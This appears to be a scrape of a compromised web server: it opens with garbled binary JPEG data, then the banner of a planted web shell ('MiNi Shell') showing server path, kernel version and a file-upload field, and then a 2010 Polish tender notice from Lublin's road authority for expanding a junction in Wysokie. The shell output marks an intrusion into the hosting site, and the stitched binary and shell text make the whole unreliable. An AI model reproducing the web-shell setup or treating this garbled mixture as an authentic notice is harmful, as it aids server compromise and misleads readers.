JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100531/150614-N-2010.html

<p class="kh_header"><b>Lublin: Rozbudowa skrzyżowania w m. Wysokie w ciągu drogi wojewódzkiej 
nr 835 Lublin - Wysokie - Biłgoraj - Sieniawa - Przeworsk - Kańczuga -Dynów - Grabowica Starzeńska oraz Nr 842 Rudnik Szlachecki - Wysokie -Krasnystaw.</b><br>
<b>Numer ogłoszenia: 150614 - 2010; data zamieszczenia: 31.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich , ul. Turystyczna 7A, 20-207 Lublin, woj. lubelskie, tel. 081 7495300, faks 081 7495341.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa skrzyżowania w m. Wysokie w ciągu drogi wojewódzkiej 
nr 835 Lublin - Wysokie - Biłgoraj - Sieniawa - Przeworsk - Kańczuga -Dynów - Grabowica Starzeńska oraz Nr 842 Rudnik Szlachecki - Wysokie -Krasnystaw..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAKRES ROBÓT OBEJMUJE MIĘDZY INNYMI NASTEPUJĄCE ROBOTY:
I. BRANŻA  DROGOWA
1. Roboty przygotowawcze
roboty pomiarowe
nadzór archeologiczny
usunięcie warstwy humusu
rozbiórki elementów dróg, ogrodzeń
2. Roboty ziemne
wykonanie wykopów
wykonanie nasypów
3. Odwodnienie korpusu drogowego
regulacja pionowa studzienek dla zaworów wodociągowych i hydrantów
4.	Podbudowy 
koryto wraz z profilowaniem i zagęszczeniem podłoża
oczyszczenie i skropienie warstw konstrukcyjnych
podbudowy z kruszywa stabilizowanego mechanicznie
podbudowy z gruntu stabilizowanego cementem
podbudowy z chudego betonu
podbudowy z betonu asfaltowego AC 22 P 50/70 gr. 11cm
warstwa wyrównawcza AC 16 W 50/70
warstwa wyrównawcza z kruszywa łamanego 0/31,5 stabilizowanego mechanicznie
5.	Nawierzchnie
nawierzchnia poboczy z kruszywa
nawierzchnie z kostki kamiennej granitowej
nawierzchnia z kostki brukowej betonowej gr. 8cm
ułożenie geosiatki o Rn powyżej 80kN/m
frezowanie nawierzchni bitumicznej
warstwa wiążąca z betonu asfaltowego 0/16 (AC 16 W 50/70) gr. 8cm
warstwa wiążąca z betonu asfaltowego 0/11 (AC 11 W 50/70) gr. 4cm
warstwa ścieralna z betonu asfaltowego 0/11 (AC 11 S 50/70) gr. 4cm
warstwa ścieralna z betonu asfaltowego 0/11 (AC 11 S 50/70) gr. 6cm
warstwa ścieralna z SMA 0/11 (SMA 11 35/50) gr. 5cm
6.	Roboty wykończeniowe
umocnienie skarp płytami ażurowymi 60x40x8
przepusty pod zjazdami z rur HDPE śr. 50cm
przepusty z rur żelbetowych śr. 80cm
wykonanie studzienek rewizyjnych
wykonanie wpustów krawężnikowych
7.	Elementy ulic
krawężniki betonowe wystające o wymiarach 15x30cm
krawężniki betonowe wystające o wymiarach 20x30cm
krawężniki betonowe obniżone o wymiarach 20x22
krawężniki kamienne
chodniki z kostki brukowej betonowej
obrzeża betonowe 30x8cm
8.	Inne roboty
ściana oporowa betonowa (kształt litery L)
II. PRZEPUSTY
1.	Roboty przygotowawcze
roboty pomiarowe
2.	Roboty rozbiórkowe
Frezowanie nawierzchni bitumicznej
Rozebranie podbudowy z brukowca
Rozebranie przepustów rurowych
3.	Budowa przepustu
Wykopy jamiste 
Umocnienie ścian wykopów palami szalunkowymi stalowymi
Ułożenie geotkaniny i georusztu
Podbudowy z kruszyw naturalnych
Części przelotowe prefabrykowanych przepustów drogowych rurowych dwuotworowych z rur o śr. 90cm x 2 (rury stalowe)
Wypełnienia pianobetonem
Ułożenie geowłókniny i geomebrany nad przepustem
Zasypanie wykopów
Umocnienie dna wlotu i wylotu kostką betonową
4.	Roboty drogowe
Podbudowy z gruntu stabilizowanego cementem
Warstwa górna podbudowy z kruszyw łamanych
III. INŻYNIERIA RUCHU
1.	Oznakowanie poziome
Oznakowanie poziome jezdni materiałami grubowarstwowymi
2.	Znaki drogowe pionowe
Ustawienie słupków z rur stalowych i konstrukcji wsporczych do tablic
Przymocowanie do gotowych słupków tablic znaków drogowych
Ustawienie na poboczu słupków prowadzących U-1a
Ustawienie elementów odblaskowych U-1c
Ustawienie znaków hektometrowych
Ustawienie słupków przeszkodowych U-5b
Ustawienie barier ochronnych stalowych U-14a
Ustawienie bariero poręczy U-11b
Tablice prowadzące U-3a
IV. ZIELEŃ
1.	Usunięcie drzew i krzewów
Ręczne karczowanie drzew
Mechaniczne karczowanie zagajników i pni
2.	Zieleń drogowa
Wykonanie trawników dywanowych siewem z nawożeniem
Sadzenie drzew i krzewów iglastych
Sadzenie drzew i krzewów liściastych
V. BUDOWA OŚWIETLENIA DROGOWEGO NA ODCINKU OD KM 43+150 DO KM 43+450 W MIEJSCOWOŚCI WYSOKIE  (SŁ NR 1 STACJA WYSOKIE GS)
1.	Budowa przyłącza do SO-1nC
Montaż szafki oświetleniowej SO-1nC
Montaż przyłączy
obróbka na sucho kabli
montaż uziomów lub przewodów uziemiających
mechaniczne pogrążenie uziomów pionowych prętowych
badania, sprawdzenia i pomiary
2.	Budowa oświetlenia drogowego
Kopanie rowów dla kabli
Układanie rur osłonowych z PCW o śr. do 140mm
Przewierty mechaniczne dla rur o śr. do 125mm
Układanie kabli w rowach kablowych, rurach lub kanałach
Zasypanie rowów ręcznie
Montaż i ustawienie słupów oświetleniowych
montaż uziomów, wysięgników rurowych, opraw oświetlenia, przewodów 
sprawdzenia, badania i pomiary
VI. PRZEBUDOWA  SIECI ENERGETYCZNYCH KOLIDUJĄCYCH Z PROJEKTOWANĄ  DROGĄ W MIEJSCOWOŚCI WYSOKIE
1.	Kolizja km 43+250 - przebudowa linii SN 
Demontaż przewodów, izolatorów
Odkopanie i demontaż słupów żelbetowych
Wykopy mechaniczne pod słupy
Montaż i stawianie słupów wirowanych 1-żerdziowych linii napowietrznej SN
Montaż izolatorów i przewodów
2.	Kolizja km 43+220 - przebudowa linii nn
Demontaż linii
Demontaż słupa i osprzętu
Montaż i stawianie słupów linii napowietrznej nn, słup pojedynczy z ustrojami
Montaż osprzętu linii napowietrznej, przewodów
Regulacja zwisów przewodów i prostowanie słupów linii NN
Badania
3.	Kolizja km 43+550 - przebudowa linii na Dragany 5
Demontaż linii i przyłączy
Montaż przyłączy
Demontaż słupa rozkracznego i osprzętu
Montaż i stawianie słupów linii napowietrznej NN z żerdzi wirowanych, słup pojedynczy
Montaż osprzętu, przewodów
Regulacja zwisów przewodów i prostowanie słupów linii NN
Badania i pomiary
Szczegółowy zakres robót ujęty jest w projektach budowlanych i wykonawczych w Szczegółowych Specyfikacjach Technicznych oraz w przedmiarze robót stanowiącym część pomocniczą określenia ilości robót.
Całkowita wartość zamówienia: 2.866.165,52 zł netto..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających stosownie do art. 67 ust. 1 pkt 6.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.12.00-0, 45.11.11.00-9, 45.23.00.00-8, 45.23.30.00-9, 45.23.32.00-1, 45.23.33.00-2, 45.23.31.00-0, 45.23.31.42-6, 45.23.32.53-7, 45.23.32.21-4, 45.23.32.80-5, 45.31.11.00-1, 45.23.14.00-9, 45.40.00.00-1, 71.35.19.14-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości 
30.000,00 zł. (słownie złotych: trzydzieści tysięcy 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien wykonać w ciągu ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 1 zadanie polegające na budowie lub rozbudowie skrzyżowania dróg publicznych na skrzyżowanie typu rondo gdzie co najmniej jedna z dróg była klasy G lub wyższej,  o  wartości robót drogowych  minimum 1.000.000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3)	Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem technicznym Wykonawca winien dysponować jednostkami sprzętu i środkami transportu wymienionymi poniżej:
1	Koparka o pojemności łyżki 0,25 m3  i więcej - 3szt
2	Ładowarka o pojemności łyżki 0,75 m3	- 2szt
3	Spycharka o mocy 75 KM - 1szt
4	Równiarka o mocy 75 KM - 1szt
5	Samochód skrzyniowy o ładowności 5 t lub więcej - 2szt
6	Samochód samowyładowczy  o ładowności min 10 t (z możliwością przykrycia brezentem) - 4szt
7	Żuraw samochodowy o udźwigu 5- 6 t	- 2szt
8	Zagęszczarki mechaniczne - 2szt
9	Walec samojezdny ogumiony średni - 1szt
10	Walec samojezdny stalowy statyczny 10 t - 1szt
11	Walec samojezdny stalowy 15 t - 1szt
12	Skrapiarka do bitumu - 1szt
13	Rozkładarka mas bitumicznych z możliwością wstępnego zagęszczenia, z możliwością ułożenia nawierzchni maksymalnie dwoma przejściami na całej szerokości, z elektronicznym sterowaniem, wyposażona w urządzenia pomiarowo- kontrolne	- 1szt
14	Frezarka drogowa ze sterowaniem elektronicznym - 1szt
15	Wytwórnia mas bitumicznych o wydajności min 100 Mg/ h* - 1szt 
*Uwaga! Zamawiający wymaga wskazania lokalizacji wytwórni mas bitumicznych. Lokalizacja winna spełniać warunek czasu transportu mas bitumicznych 
od momentu załadowania do momentu rozpoczęcia rozładunku (do 2 godz.). 
W przypadku wątpliwości spełnienia tego warunku Zamawiający zastrzega sobie możliwość praktycznego sprawdzenia. Odległość należy liczyć od wytwórni 
do najdalszego miejsca robót po drogach umożliwiających przejazd samochodów 
o ładowności minimum 10 ton.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien dysponować:
a)	osobą zdolną do pełnienia funkcji kierownika budowy, posiadającą uprawnienia budowlane branży drogowej bez ograniczeń  oraz doświadczenie: pełnienie funkcji kierownika budowy/robót  minimum  na 1 zadaniu polegającym na budowie lub rozbudowie skrzyżowania typu rondo, gdzie co najmniej jedna z dróg była klasy G lub wyższej oraz których wartość robót drogowych wynosiła co najmniej 1.000.000 zł brutto.
b)	osobą zdolną do pełnienia funkcji kierownika robót posiadającą uprawnienia budowlane branży elektrycznej bez ograniczeń oraz doświadczenie:  pełnienie funkcji kierownika robót /budowy na minimum 1 zadaniu, którego wartość robót w branży elektrycznej wynosiła co najmniej 100.000 zł brutto.
c)	osobą zdolną do pełnienia funkcji kierownika robót posiadającą uprawnienia budowlane branży konstrukcyjno-budowlanej bez ograniczeń. 
Osoby przewidziane do pełnienia samodzielnych funkcji technicznych 
w budownictwie muszą posiadać wymagane uprawnienia, które zostały wydane  zgodnie z ustawą prawo budowlane z dnia 7 lipca 1994 r. (z póź. zmianami) art.12 ustęp1 ppkt2,ustęp7, art.12a  lub uprawnienia uzyskane na podstawie przepisów obowiązujących przed wejściem w życie ustawy prawo budowlane 
z 1994 r,  natomiast w przypadku osób które uzyskały uprawnienia w innych krajach Unii Europejskiej posiadane uprawnienia muszą spełniać warunki określone  w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej 
(Dz.U. Nr 63,poz.394).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	dowód wniesienia wadium.
b)	ofertę przetargową (z ceną netto i z podatkiem VAT) wraz z załączonym Kosztorysem ofertowym.
c)	Wykaz części zamówienia, których wykonanie Wykonawca zamierza zlecić podwykonawcy.
d)	 w przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
e)	w przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które nie są wymienione w odpisie z właściwego rejestru do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę.
f)	   wstępny harmonogram robót</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty polegających na: 
1. Zmiany rozwiązań technicznych w dokumentacji projektowej  wykonania zamówienia i 
     terminu zakończenia robót:
a) Na wniosek Wykonawcy, za zgodą Zamawiającego w trakcie prowadzenia inwestycji, mogą być dokonywane zmiany technologii wykonywania elementów robót. Dopuszcza się je tylko w przypadku gdy, proponowane przez niego rozwiązanie jest równorzędne lub lepsze funkcjonalnie od tego, jakie przewiduje projekt a Wykonawca nie będzie żądał zwiększenia wynagrodzenia za wykonywane roboty.
         W tym przypadku Wykonawca przedstawia projekt zamienny zawierający opis      
         proponowanych zmian wraz z rysunkami. Projekt wymaga zatwierdzenia przez nadzór 
         autorski / projektanta /, uzgodnienia z inspektorem nadzoru i akceptacji Zamawiającego. Powyższe  zmiany nie dotyczą terminu zakończenia robót.
b) W przypadku gdy wystąpią roboty dodatkowe  nie objęte zamówieniem podstawowym  niezbędne do jego prawidłowego wykonania, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia i nie mające wpływu na termin zakończenia zamówienia podstawowego, Zamawiający złoży  dodatkowe zamówienie na ich wykonanie w trybie wynikającym z Ustawy Prawo Zamówień Publicznych. 
   Zmiana będzie dotyczyć tylko zmian technicznych w dokumentacji projektowej. 
c)	W przypadku gdy wystąpią roboty dodatkowe nieprzewidziane w dokumentacji projektowej lub kolizje  nie objęte zamówieniem podstawowym a konieczne do wykonania przed robotami podstawowymi Zamawiający złoży  dodatkowe zamówienie na ich wykonanie w trybie wynikającym z Ustawy Prawo Zamówień Publicznych. 
Zmiana będzie dotyczyć  zmian technicznych w dokumentacji projektowej i terminu zakończenia zamówienia podstawowego.
d) W uzasadnionych przypadkach gdy realizacja zadania według dokumentacji technicznej i SST powodowałoby wadliwe wykonanie przedmiotu umowy dopuszcza się wprowadzenie zmian  w  stosunku do dokumentacji projektowej bez zmiany terminu zakończenia robót.
e) W przypadku gdy z punktu widzenia Zamawiającego zachodzi potrzeba zmiany rozwiązań technicznych nie przewidzianych w umowie, Zamawiający sporządza protokół konieczności, a następnie  dostarcza dokumentację projektową na te roboty.

2.  Zmiany terminu zakończenia zamówienia podstawowego 
1) Spowodowane warunkami atmosferycznymi:
a)	Klęski żywiołowe
b)	Gdy warunki atmosferyczne odbiegają od warunków określonych w SST i uniemożliwiają prowadzenie robót budowlanych przeprowadzanie prób i sprawdzeń oraz dokonywanie odbiorów
2) Spowodowane warunkami geologicznymi, archeologicznymi 
a)	Niewybuchy, niewypały
b)	Wykopaliska archeologiczne

3.	 Zmiany dotyczące zakresu robót i wynagrodzenia 
a)	nieprzewidziane kolizje z robotami prowadzonymi równolegle przez inne podmioty. 
W takim przypadku zmiany w umowie zostaną ograniczone do zmian powodujących  uniknięcie lub usunięcie kolizji jak: zmiana sposobu wykonania, materiałów, technologii, lokalizacji wbudowywanych urządzeń oraz zmiana terminu i wynagrodzenia.
b)	okoliczności powodujące zmniejszenie zakresu przedmiotu zamówienia. W przypadku 
zmniejszenia zakresu przedmiotu zamówienia przez Zamawiającego, wynagrodzenie należne wykonawcy za wykonane roboty pozostaje w takim stosunku do umownego wynagrodzenia ryczałtowego, w jakim wykonane roboty budowlane pozostają do całości robót wyszczególnionych w łączącej strony umowie. Zmiana wartości ustalona zostanie na podstawie kosztorysu ofertowego.

4.  Zmiany osobowe 
         a) zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne     
             spełniające warunki określone w SIWZ
         b) Zamawiający dopuszcza możliwość wyrażenia zgody na wykonywanie robót przez 
              podwykonawców nie wskazanych w ofercie lub zakres nie wskazany w ofercie jako 
              planowany do powierzenia podwykonawcom. Zamiana taka nie wymaga aneksu do      
              umowy i może być przeprowadzona przy zachowaniu procedury zatwierdzenia       
              podwykonawców wynikającej z przepisów prawa i SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/zdw<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można odebrać w siedzibie Zamawiającego, lok. 203, lub pocztą elektroniczną po wcześniejszym przesłaniu zamówienia na adres:dzp@zdw.lublin.pl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2010 godzina 08:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, ul. Turystyczna 7a, pok. 107. Otwarcie ofert nastąpi w dniu 15.06.2010 o godz.08:30 w pok. 208..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




